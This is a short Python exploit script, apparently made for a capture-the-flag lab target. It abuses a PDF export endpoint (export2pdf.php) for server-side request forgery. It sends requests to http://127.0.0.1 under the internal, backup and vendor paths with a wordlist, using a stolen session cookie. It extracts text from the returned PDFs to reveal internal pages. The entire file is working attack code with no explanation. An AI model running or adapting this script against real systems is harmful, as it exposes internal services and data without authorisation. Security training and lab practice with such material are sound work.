exploit.py

import requests
import io
import PyPDF2
from main import get_cookie
ip = "10.10.240.103"  # change to target ip

url = "http://10.10.240.103/export2pdf.php"
cookie = get_cookie(ip)
origin = f"http://{ip}"
referer = f"http://{ip}/index.php"

header = {
    'Host': ip,
    'Content-Length': "40",
    'Cache-Control': "max-age=0",
    'Upgrade-Insecure-Requests': "1",
    'Origin': origin,
    'Content-Type': "application/x-www-form-urlencoded",
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    'Referer': referer,
    'Accept-Encoding': "gzip, deflate",
    'Accept-Language': "en-US,en;q=0.9",
    'Cookie': f"PHPSESSID={cookie}",
    'Connection': "close"
}

path = ["internal", "backup", "vendor"]
wordlist = open("common.txt", "r", encoding="utf-8", errors="ignore")
wordlist2 = wordlist.read()
for path in path:
    for x in wordlist2.strip().split():
        datas = {
            'url': f"http://127.0.0.1/{path}/{x}/"
        }
        response = requests.post(url, headers=header, data=datas)
        if response.status_code == 200:
            pdf_bytes = io.BytesIO(response.content)
            pdf_reader = PyPDF2.PdfFileReader(pdf_bytes)
            found = False
            for page_num in range(pdf_reader.numPages):
                page = pdf_reader.getPage(page_num)
                text = page.extractText()
                if "Not Found" in text:
                    found = True
                    print(f"Page /{x}: Not Found")
                    break
            if not found:
                for page_num in range(pdf_reader.numPages):
                    page = pdf_reader.getPage(page_num)
                    text = page.extractText()
                    print("=" * 63)
                    print(f"/{x} => ")
                    print(f"Page {page_num + 1}: {text}")
                    print("=" * 63)